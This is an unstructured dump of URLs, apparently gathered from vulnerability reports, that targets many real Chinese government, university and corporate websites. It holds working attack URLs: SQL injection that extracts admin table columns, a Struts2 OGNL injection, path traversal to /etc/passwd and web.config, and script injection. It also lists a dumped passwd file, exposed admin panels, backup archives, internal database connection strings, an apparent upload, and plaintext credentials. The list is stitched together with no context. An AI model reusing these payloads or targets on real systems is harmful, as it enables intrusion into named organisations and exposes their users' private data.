http://www.lixia.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jinhua.gov.cn/jcms/services/WSSynchronize?wsdl http://zzb.10.gov.cn/jcms/services/WSSynchronize?wsdl http://www.ninghai.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jining.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSSynchronize?wsdl http://www.zgzhijiang.gov.cn/jcms/services/WSSynchronize?wsdl http://www.hzgjj.gov.cn/jcms/services/WSSynchronize?wsdl http://anxiang.gov.cn/jcms/services/WSSynchronize?wsdl http://jcms.nantong.gov.cn/jcms/services/WSSynchronize?wsdl http://www.geta.gov.cn/jcms/services/WSSynchronize?wsdl http://pub.jsds.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSSynchronize?wsdl http://www.nbxsws.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jsforestry.gov.cn/jcms/services/WSSynchronize?wsdl http://www.lc-news.com/jcms/services/WSSynchronize?wsdl http://www.xinghua.gov.cn/jcms/services/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5/services/WSSynchronize?wsdl http://www.jinxiang.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdxm.gov.cn/jcms25/service/WSSynchronize?wsdl http://www.xwzf.gov.cn/jcms24/service/WSSynchronize?wsdl http://www.zjdpc.gov.cn/jcms/services/WSSynchronize?wsdl http://www.jskx.org.cn/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.jdxc.net/jcms/service/WSSynchronize?wsdl http://sfl.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://nyyey.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://edu.tcjmxx.cn/jcms/service/WSSynchronize?wsdl http://www.haiyan.gov.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://xjco.cscec.com/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/service/WSSynchronize?wsdl http://njzx.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.weihai.gov.cn/jcms/service/WSSynchronize?wsdl http://www.rongcheng.gov.cn/jcms/service/WSSynchronize?wsdl http://www.yidu.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tzhl.gov.cn/jcms/service/WSSynchronize?wsdl http://www.cxyx.cn/jcms/service/WSSynchronize?wsdl http://www.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.yzu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.gzwd.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdfda.gov.cn/jcms/services/WSSynchronize?wsdl http://www.czzl.gov.cn/jcms/services/WSSynchronize?wsdl http://yxy.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://www.bisu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.nanxun.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sheshantravel.com/jcms/services/WSSynchronize?wsdl http://sha.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/services/WSSynchronize?wsdl http://fx.10.gov.cn/jcms/services/WSSynchronize?wsdl https://vpn.ct1000.com/dana-na/auth/url_0/welcome.cgi http://www.cc148.gov.cn/liuyan.jsp?id=1132 http://www.mount-tai.com.cn/wap/list.aspx?id=160 http://www.cnmo.com/xiaodao.tar.gz http://www.ieasy.tv/ http://www.ieasy.tv/index.php/news/detail?id=3056 http://external1.fesco.com.cn/NOKIA/nokiapquery/BBSList.aspx?Flag=1&BBSType=1 http://external1.fesco.com.cn/NOKIA/nokiapquery/BBSList.aspx?Flag=1&BBS http://www.sqlmap.org http://gongxiang.51tek.com/ http://wljx.ynftc.cn/include/htmleditor/admin/default.php http://211.141.201.156/include/htmleditor/admin/default.php http://jxzy.hcvt.cn/include/htmleditor/admin/login.php http://jp.cqepc.cn/include/htmleditor/admin/login.php http://pt.cqtbi.edu.cn/include/htmleditor/admin/login.php http://zyk.nxcy.edu.cn/include/htmleditor/admin/login.php http://kczy.cswu.cn//include/htmleditor/admin/login.php http://gongxiang.51tek.com/ http://gongxiang.51tek.com/admincp.php?action=user&todo=edit&tid=197 http://gongxiang.51tek.com/ gongxiang.51tek.com/admincp.php?action=department&todo=editdep&depid=56&do=0 http://gongxiang.51tek.com/ http://gongxiang.51tek.com/admincp.php?action=siteclass&todo=resume&classid=200 http://gongxiang.51tek.com/ http://gongxiang.51tek.com/departmentcp.php?action=department_news&todo=editnews&nid=130&id=34 http://www.okcis.cn/php/yaobiao/caigou.php?id=13001 www.weidulinchang.com/admin/login.aspx guopei.xcu.edu.cn/About.asp?ID=21 zhuanti.xcu.edu.cn/lfy/news/news1.php?id=6 www.czfzb.gov.cn/admin/login.asp http://www.czfzb.gov.cn/123.asp http://www.95572.com/jsp/ywbl/zc.jsp http://see.tongji.edu.cn/TjComm/Ch/kyview.asp?ID=29 http://cad.tongji.edu.cn/cad/newslist.aspx?id=42 http://mat.tongji.edu.cn/StuLogin.aspx?id=1 http://cad.tongji.edu.cn/cad/newslist.aspx?id=42 http://user.rayli.com.cn/home.php?mod=space&do=wealth&gid= http://www.shyj.gov.cn/piclist.asp?classid=2 http://e12580.net/中国移动12580电子优惠券 http://789.e12580.net/login.aspx http://wap.hxrc.com http://114.255.121.29:8888 http://m.rayli.com.cn/article/video_search_test.php?page=&page=1&searchword=1&ver=iphone http://222.171.146.9/res/需要通过姓名和身份证号查询自己的考试信息,但是我发现http://222.171.146.9/res/info.php?cid=xxx(xxx代表三位数)直接通过更改后三位数,可以随意查看信息。包括身份证号和姓名以及考场信息。 http://eb.cs-air.com/kcbassess/assMan/Kcb_apassesstable_add.jsp?dotype=modify&apat_atid=1004&rt_depid=%28CAN%29%28%BF%CD%B2%D5%B2%BF%29 http://www.jzswsj.gov.cn/cs_lyb.jsp?catlogName=%E7%BD%91%E4%B8%8A%E6%8A%95%E8%AF%89&s_flag=0 http://www.mingjian.com/news.php?cid=132 http://www.easysale.me/system/login.do http://wifi.liebao.cn/top/index.php?s=/index/updataData sspai.com/account/emailsuccess?code=1 http://www.h3w.com.cn/index.html http://www.tongji-di.org/infor_news.asp?sid=12&id=894 http://www.ahbbjjjc.gov.cn/summaryarticle.php?MsgId=19514 http://mail.12306.cn/app/mail/login http://mail.12306.cn/app/mail/login http://edm.kongzhongedm13.com/unsubscribe_form.php?list_name=hkz007_list_1419236812&flag=1419237361&list_request=unsubscribe&email= https://member.hipiao.com/ MYSQL:root http://weibo.10086.cn/cwb/article.php?id=10404 http://www.yn.xinhuanet.com/v/2014-12/26/c_133880414.htm http://car.m.jd.com/jdshop.html?catId=400103411%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E http://wap.bjoil.com/htmlLogin/registration.action http://wj.gpjh.cn/ http://www.cloud511.com/case http://test.gxjjls.com/addUser.do?spreadUserId= http://www.jylbx.com/addUser.do?spreadUserId= http://www.hangzhoudrt.com/addUser.do?spreadUserId= http://www.smdyf.cn/addUser.do?spreadUserId= http://www.46buy.com/fyct/addUser.do?spreadUserId= http://www.sydyf.com/addUser.do?spreadUserId= http://fixedassets.ku6.cn/.svn/entries http://61.155.159.159/cacti/ http://116.58.221.12/login/userInfo!isCanSendPwd.action http://wap.vanho.cn/desc.action?cpId=600276&name=WapHelpOperation http://fxb.csair.com/bbs2/admin.php http://sms.taikang.com/admin.tar http://sms.taikang.com/admin/files/tk_plorer/ http://www.liyouit.com/ http://www.liyouit.com/feedbook.php http://serviceshop.lenovo.com.cn/purchase/orderconfirm.aspx?orderNo=这里是订单号 http://mp.sohu.com/imgview2/20141226/b03956fd3491467ebbb7ba8ef988d9e4.jpg http://jsbin.com/sefenepomi http://mp.sohu.com/main/ad/view.action http://km3.pw/Sohu%20Flash%20CORS.mp4 http://my.gfan.com/findPwdByMobile http://www.mafengwo.cn/path/44068065/27779-0.html http://acm.hdu.edu.cn/diy/contest_search.php?action=go http://fixedassets.ku6.cn/req_sub_business_list.php?business_id=1 failed:You http://www.airmacau.com.tw/tips/tips_searchresult.asp?Dest=MFM db:mssql db_name:tpe_web http://www.tyut.edu.cn/bwc/info_show.asp?id=738&bigid=2&smallid=14 http://www.tyut.edu.cn/wzb/login.asp http://wljg.gdgs.gov.cn/newslist.aspx?itemid=1 http://sso.118114.cn/SSO/loginV2.action http://www.wwwh.gov.cn/admin/Admin_Index.asp http://e.dianping.com/ http://ssc.zjweu.edu.cn/edit/admin/login.asp http://www.sinosig.com/logout,将使用户退出登录; http://www.sinosig.com/agent_modifyAgent.action?iocModifyPsnInfoFlagUrl= http://kjc.xtu.edu.cn/myphp/kjc/show.php?tid=3&nid=417%20aNd%201=2%20unIon%20all%20selEct%201,2,concat%280x5e5b,COLUMN_NAME,0x5d5e%29,4,5,6,7,8,9,10%20from%20information_schema.COLUMNS%20whEre%20TABLE_NAME=0x61646D696E75736572%20limit%201,1%23 http://stbc.hwcc.gov.cn/OutsideGroup/zhuanti_more.asp?LeiMuName=会议类专题报道&LeiMuName2=全国水土保持科技示范园区建设工作座谈会&ZhuantiID=6 http://brand.wljhealth.com/div.php?act=giftPopExchange&id=1 http://www.dyxz.gov.cn//application/zwdt/query.jsp http://www.dyxz.gov.cn//application/zwdt/query.jsp http://www.dyxz.gov.cn//application/zwdt/query.jsp http://www.gzegn.gov.cn:8080//application/zwdt/query.jsp http://www.gzegn.gov.cn:8080//application/zwdt/query.jsp http://www.gzegn.gov.cn:8080//application/zwdt/query.jsp http://www.jhqz.com/Lifting/newsinfo.php?id=124 http://dep.hnust.cn/jd/manage/login.asp http://www.jit.com.cn/ http://222.34.78.21/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://218.27.207.22/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://222.160.140.29:8000/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://zwgk.wangqing.gov.cn/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://www.ilj.gov.cn/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://www.jit.com.cn/ http://218.27.207.22/zwdtSjgl/infoIndex.jsp?channelCid=6 http://218.27.190.107:8080/zwdtSjgl/infoIndex.jsp?channelCid=9 http://218.27.140.5/zwdtSjgl/infoIndex.jsp?channelCid=6 http://www.jlfm.gov.cn:8081/zwdtSjgl/infoIndex.jsp?channelCid=6 http://218.62.90.168/zwdtSjgl/infoIndex.jsp?channelCid=9 http://job.fesco.com.cn/person/work_modi.asp?id=40000000366592&lang=0&action=1&rid=40000000255216 http://job.fesco.com.cn/person/addone_modi.asp?id=40000000108931&lang=0&action=1&rid=40000000255220 http://job.fesco.com.cn/person/letter_modi.asp?id=110088 http://job.fesco.com.cn/person/resume_modi.asp?action=1&rid=40000000255210 http://search.js.cei.gov.cn/004_zhnews/search/detail.php?id=10832 http://search.js.cei.gov.cn/ http://www.fyxf.fy.cn/dispnews.php?artid=70240 http://59.151.127.48/SystemOpsPlatform/php/Interface/receiveApplyFeedback.php http://www.ncjmw.gov.cn www.yichekey.com www.yichekey.com www.yichekey.com www.yichekey.com www.yichekey.com http://www.thermos.com.cn/news.php?curr_page=news_spec_detail&id=62 http://uqkun.taobao.com/ http://222.80.103.52:1000/XJPROJECTC/Login_userLogin.action http://222.80.103.52:1000/XJPROJECTC/bak.jsp http://wooyun.org/bugs/wooyun-2014-082767 www.gzbg100.cn http://www.changedu.com/ http://desktop.nju.edu.cn/cx/ http://dxscx.forestpolice.net/ http://180.209.64.18/cxcy/Index.aspx http://210.26.14.200/ http://sjjx.njit.edu.cn/cx/ http://nausrt.njau.edu.cn/ http://202.195.237.148/dcxm/Index.aspx http://sy.cxxy.seu.edu.cn/cx/ http://cx.njxzc.edu.cn/ http://210.38.64.108/cx/ http://cx.yctc.edu.cn/ http://cxsb.yzu.edu.cn/ http://cxcy.shisu.edu.cn/ http://cxcy.lzu.edu.cn/Index.aspx http://210.46.116.20/ http://jw1.jiangnan.edu.cn/dxscx/ http://202.119.81.120/ http://bylw.pk.njau.edu.cn/gxycx/ http://www.cz121.com/forecast/weatherjs.asp?vp=24 http://tgong.yaowan.com/gonggao/20371.html?username=daishenyang123&pwd=986513 http://**.**.**/logon.doprocessID=logonMail&userName=用户名@mail.china.com http://www.ysepay.com/ jxkjg.jxehe.com/manage/default.htm http://vip.yishion.com/card.php?id=1 http://csm.taikang.com/ec/csm/query/policyDetail.jsp?policyno=2801013639310&md5s=e8dff3a05b18ce1ce42cf8a7f4ef7c68 http://csm.taikang.com/ec/csm/query/policyDetail.jsp?policyno=2801013639327&md5s=de6ea342f87512b7ccc1f1c1a7d4fa83 http://csm.taikang.com/ec/csm/query/policyDetail.jsp?policyno=2801013639324&md5s=ed31d2b05ad64e0b37a1b4d8ee8531d9 http://www.tzxczs.com/ckfinder/ckfinder.html http://www.0513chaotai.com//ckfinder/ckfinder.html http://www.zycm-china.com//ckfinder/ckfinder.html http://www.east-rubber.com//ckfinder/ckfinder.html http://www.renature.cn//ckfinder/ckfinder.html http://www.linhaijiahao.com//ckfinder/ckfinder.html http://www.honormoto.cn//ckfinder/ckfinder.html http://www.zjtraffic.com//ckfinder/ckfinder.html http://www.chinaquila.com//ckfinder/ckfinder.html http://www.chinaquila.com//ckfinder/ckfinder.html http://www.cnyaren.cn//ckfinder/ckfinder.html http://zb.ujs.edu.cn:8080/phpadmin/index.php http://zb.ujs.edu.cn:8080/admin/ http://222.73.46.121:8080/ http://**.**.**/ http://data.gfan.com/invoker/JMXInvokerServlet/ https://passport.ly.com/Member/MemberLoginAjax.aspx http://oa.haust.edu.cn/ http://gmu.baidu.com/demo/data/tabs/proxy.php?debug=1&key=&file=proxy.php https://github.com/fex-team/GMU/blob/master/examples/data/tabs/proxy.php http://218.60.147.21:8080/test1.txt http://www.lorealprofessionnel.com.cn/admin/ http://124.207.155.136:8080/signUp/system/indexLogin.action http://gsgd.jnu.edu.cn/admin/login.asp http://gsgd.jnu.edu.cn/admin/Lt.Add.asp?Action=add&ModeID=1&ClassID=&Channel=Default http://gsgd.jnu.edu.cn/upfiles/20141227/20141227195016771677.asp http://success.hp.com/lexika/list.php?act=articlesearch&search[metainfo_id]=318432%27 http://125.88.6.173/main/UserManager-esmsLogin.action http://125.88.6.173/main/UserManager-esmsLogin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://m.mafengwo.cn/sales/comments.php?id=311008 http://cc.ahmu.edu.cn/j_jxdt/index.php?ty=36&zlm=30 http://jskj.zjer.cn/ http://ffp.scal.com.cn/FFPNewWeb/ http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule http://cis.zjicm.edu.cn/?page_id= http://yyxy.zjicm.edu.cn/yyxynew/BigClass.asp?typeid=2&bigclassid=144 http://news.zjicm.edu.cn/ht http://218.75.124.141:8090/zjcm_gh/manage/main/pages/ http://cmxw.zjicm.edu.cn/ http://cmxw.zjicm.edu.cn/admin/editor/admin_login.asp http://mall.pigai.org http://www.pigai.org/index.php?c=teacher&f2= http://mall.pigai.org/static/.svn/entries http://www.pigai.org/index.php?c=teacher&a=createv2就绕过了。 https://finance.gagc.com.cn/server/login.jsp或https://gagc.com.cn/server/login.jsp http://i.ui.cn/ucenter/135516.html http://sales.wostore.cn:8083/active/wxseed_sharephone.action http://www.cqupt.edu.cn/cqupt/news.jsp?Type=zcfg&ID=zcfg24ec34c9-8d13-11e4-a5ed-005056932eca http://www.qzdj.gov.cn/SmallClass.asp?BName=%B8%C9%B2%BF%D6%AE%B4%B0&BType=0&SName=%D5%FE%B2%DF%B7%A8%B9%E6 inurl:login.asp http://www.ysgjjd.com/ysgjjd/Index.asp http://www.315online.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://zj.zjfzb.gov.cn:9999/zfjdpt/userLogin-logout.action http://www.hzcg.gov.cn/fckeditor/editor/fckdialog.html,而且没有做什么设置可以直接上传iis的解析漏洞格式 http://info.10010.com/chinaunicomSearchJB.zip jdbc:oracle:thin:@127.0.0.1:1521:yhxx jdbc:oracle:thin:@10.2.135.78:1521:yhxx jdbc:oracle:thin:@192.168.2.12:1521:ecom jdbc:oracle:thin:@10.142.195.58:1521:ecom jdbc:oracle:thin:@10.143.131.63:1521:ecom jdbc:oracle:thin:@10.143.131.63:1521:ecom http://www.cctime.com/weixin/index.asp?tid=952889(万恶的注入点) http://www.cctime.com/tm92dif/login/login.asp http://www.gtggjy.com/cqjy/cqjyzb/TSPBcqjyzbgg_List.jsp?pubType=1 http://www.gtggjy.com/TSPB/gtweb/public/ShowInfo.jsp?pubGuid=CC6102D433D07730D654922347990AD9 http://www.gtggjy.com/TSPB/gtweb/tender/gczb_List.jsp?itemType=1 http://www.gtggjy.com/TSPB/gtweb/tender/gczb_List.jsp?pubtitle= http://www.gtggjy.com/TSPB/gtweb/tender/gczb_List.jsp?pubType=1 http://www.gtggjy.com//TSPB/gtweb/xyxx/xyxx_List.jsp?cxLX= http://www.gtggjy.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=20D5FBB324C6B1C07D31ACD808398A9D http://www.hr135.com/company/index.php?m=index&c=index&id=3751&style=../../template/admin&tp=/admin_web_config http://218.83.241.245/cn.asp http://job.imau.edu.cn/Links.aspx?Cid=1 http://www1.imau.edu.cn/dangan/section0.php?sid=1 http://www1.imau.edu.cn/shengtai/about.php?mid=187、http://www1.imau.edu.cn/shengtai/xzzx.php?mid=162 http://115.236.99.179 http://115.236.99.179/mei.jsp http://s1.zqjlsj.funshion.com/ http://s1.zqjlsj.funshion.com//include/common.inc.php http://s1.zqjlsj.funshion.com///config.inc.php http://s1.zqjlsj.funshion.com///include/global.func.php http://s1.zqjlsj.funshion.com///include/security.inc.php http://www.ahmzyf.com/ http://218.23.98.37:8089/fckeditor/editor/filemanager/browser/default/browser.html?type=&connector=../../connectors/aspx/connector.aspx http://60.175.141.158:8089/fckeditor/editor/filemanager/browser/default/browser.html?type=&connector=../../connectors/aspx/connector.aspx http://60.173.161.48:8099/fckeditor/editor/filemanager/browser/default/browser.html?type=&connector=../../connectors/aspx/connector.aspx http://www.mafengwo.cn/group/ http://webxss.net/************ http://www.mafengwo.cn/group/ http://61.161.162.110/ www.315online.com/plus/feedback.php?aid=115005 http://221.215.1.144/login.aspx http://price.ziroom.com/?_p=../../../../../../../../../../../../../etc/passwd%00.html http://202.103.147.182:8080/ http://www.beij.12306.cn/Dzsw/Shky/hwky.nei/quickorder.action http://222.73.46.144/wealth/default.jsp http://fortune.cib.com.cn/ http://222.73.46.144/futures/picl.jsp?fileName=WEB-INF/web.xml http://222.73.46.144/product/orgFinList.jsp.bak http://222.73.46.144/index/report.jsp.bak http://222.73.46.144/product/content.jsp.bak http://222.73.46.144/price/about.jsp.bak http://222.73.46.144/index/adsearch.jsp.bak http://222.73.46.144/product/hotProductList.jsp.bak http://222.73.46.144//product/productContent.jsp.bak http://36.33.0.36:8099/可利用 http://36.33.0.36:8888/license!getExpireDateOfDays.action存在st2命令执行。 http://we.ztems.com/findImei.action http://61.153.64.219:8008/WebRoot/ http://www.xtst.gov.cn/down_tiao.aspx?x=../web.config&j=1 http://cloudclass.ouchn.edu.cn/ http://job.fesco.com.cn/company.rar http://www.hljforest.gov.cn:8888/yjzj/tousu/lanmu1_qiantao_07_2.jsp?fl=tousu http://www.mifan365.com/account/information_detail.php?id=49 http://service.boway.com/Default.aspx http://cnc.boway.com/Default.aspx www.smartcome.com,结果上去访问之后弹出,弹出的防御界面是百度云加速的图片 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://124.65.124.98:7003/gjfpb/ http://kyxt.wh.sdu.edu.cn/login.jsp http://www.chinatt315.org.cn/sitemap.txt http://www.chinatt315.org.cn/2009315hd/qy_detail.asp?id=377 http://bbs.chinac.com/ http://secure.jlpadis.gov.cn/secure/countPlatform/ http://www.dagexing.com/ https://61.144.43.67:6443/ http://bbs.173.com/ http://fnqx.fy.cn/listnews.php?chnid=bg1 http://59.38.35.83:8080/login.action;jsessionid=EC8413A2E26E4BC0931F35C850873286?redirect=%2F www.fesco.com.cn www.fesco.com.cn http://www.suning.com.cn/update.aspx?type=delupfile&v2=image15.png http://www.suning.com.cn/djgz/login.asp http://180.168.124.197/site/login.htm http://dximg.imooc.com/ http://dximg.imooc.com/.svn/entries http://img.imooc.com inurl:e-learning/index.asp http://mall.lakala.com/orders/vieworder?ot=1368148428298&orderId=20130510105698 VERSION:1.2.3 http://cinvestors.tebon.com.cn/user/reg/user!reg.action http://gim.jlu.edu.cn/login.jsp http://hd.my.letv.com/action/userRank/?id=1000002_1'+and+'1'='1&n=15&callback= http://erp.suning.com.cn/epp/core/public/infodetail.jsp?pk_message=1003271000000000YB2N http://www.yuntongxun.com/member/smsTemplate/detail?id=5491&randStr=0.29231546563096344 http://nc.xhlbdc.com/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX http://nc.pinggugroup.com:81/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://erp.suning.com.cn/epp/core/public/infodetail.jsp?pk_message=1003271000000000YB2N http://123.232.105.202/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://nc55.hspark.com/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://202.136.213.21/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://erp.minyoun.com/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://zfkg.com:8081/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://61.175.97.50/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X https://mail.sgcc.com.cn/webmail/login/login.do pzhu:12345qwert http://shixi.189.cn/ http://shixi.189.cn/shixibao/space.php?do=xm_enterprise&ignore=1&companyid=134 http://shixi.189.cn/shixibao/e/member/login/loginjs.php?&user=0&mm=&t=0.12015561351379322 http://www.dagexing.com http://12580wap.10086.cn/wap5/wapindex.do?r.cityId=10000000&r.cityName=%E5%8C%97%E4%BA%AC&r.keyword=%E4%B8%AD%E9%80%9A%E5%BF%AB%E9%80%92%E5%8D%95%E5%8F%B7%E6%9F%A5%E8%AF%A2 http://erp.suning.com.cn//hrss/ http://erp.suning.com.cn http://zjrmfy.wuhai.gov.cn/ http://zjrmfy.wuhai.gov.cn//general/download.aspx?path=/web.config http://123.124.18.149/Learning/user/traincenter/DoorVideoEntry.action http://peixun.ciqcid.com/test/listAllTestPaper.action http://www.ls.hbnu.edu.cn/front-index.action http://www.fzwsrc.com/sydwzk/refer/frequent.jsp http://www.xmws.gov.cn/sydwzk/refer/frequent.jsp http://www.lywsrc.com/sydwzk/refer/frequent.jsp http://222.76.242.182/sydwzk/refer/frequent.jsp http://mx.smrsks.com/sydwzk/refer/frequent.jsp http://125.89.152.180:888/sydwzk/refer/frequent.jsp http://www.zzsyzp.com/sydwzk/refer/frequent.jsp www.52jscn.com,此网站是dedecms类型的,但是测试payload的时候,发现此站点使用了百度云加速防护。 http://www.52jscn.com/plus/search.php?keyword=123%20and%201=1 http://www.52jscn.com/plus/recommend.php http://web.zoosnet.net/zoosnet.rar http://118.144.76.63:8090/applicant/forwardResumeCollection http://gh.zufe.edu.cn/inc/gofixednewsList.asp?newsType=fixednews_820 gouser.3g.net.cn/userManage/ http://www.szmuseum.com/mod/shop/quest/ajax.php?op=auction_buy http://xyh.cdu.edu.cn/donatefile.php?id=7 http://xyh.cdu.edu.cn/schnewslist.php?id=2 http://wsxx.cdu.edu.cn/product/product.php?Cat_ID=29 http://wsxx.cdu.edu.cn/about/About.php?ID=1 http://old.xtgtzy.gov.cn/list.asp?classId=10 http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309 http://old.xtgtzy.gov.cn/chinese/Bs_DownloadShow.asp?Bs_DownID=104 http://old.xtgtzy.gov.cn/chinese/Bs_NewsInfo.asp?Action=Co&ID=88 http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309 http://www.cqfzb.gov.cn/web.rar http://uc.pcpop.com/uc_login.php?returnurl=http://www.pcpop.com http://uc.pcpop.com http://www.auto.hc360.com/web.rar http://www.baoshan.gov.cn/web.rar http://**.**.**/ http://mnote.weibo.10086.cn http://www.dapu.com/gallery-index-.html?scontent=n|%E6%AF%9B%E5%B7%BE http://www.dapu.com/gallery-index-.html?scontent=n|%E6%AF%9B%E5%B7%BE http://inc.form.xiaoma.com www.qinsmoon.com http://www.sgeg.shenhuagroup.com.cn/wzcg.jsp?id=411&pid=387&type=MENU http://www.airmacau.com.tw/about/news_articles.asp?id=220 http://www.airmacau.com.tw:8083/about/news_articles.asp?id=49 http://qqy.fjii.com/为福建省全球眼使用分布情况。 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:103:IIIMF Htt:/usr/lib/im:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin wnn:x:49:49:Wnn Server:/var/lib/wnn:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash fax:x:78:78:mgetty user:/var/spool/fax:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false radiusd:x:95:95:radiusd user:/:/bin/false radvd:x:75:75:radvd user:/:/sbin/nologin megaeyes:x:500:500::/home/megaeyes:/bin/bash xmwangwei:x:501:501::/home/xmwangwei:/bin/bash qqysom:x:502:502::/home/qqysom:/bin/bash jdbc:oracle:thin:@172.16.2.13:1521:mega http://192.168.4.96 http://192.168.4.38:2006/ehome/services/UserService http://192.168.4.38:2006/ehome/services/CompanyService http://192.168.4.20:2006/ehome/services/DeviceService http://192.168.4.38:2006/ehome/services/ManufacturerService http://192.168.4.31:2006/ehome/services/PhotoService http://192.168.4.96:2006/ehome/services/AlarmService http://192.168.4.38:2006/ehome/services/PermissionService http://www.sts.sdu.edu.cn/sts/admin/ 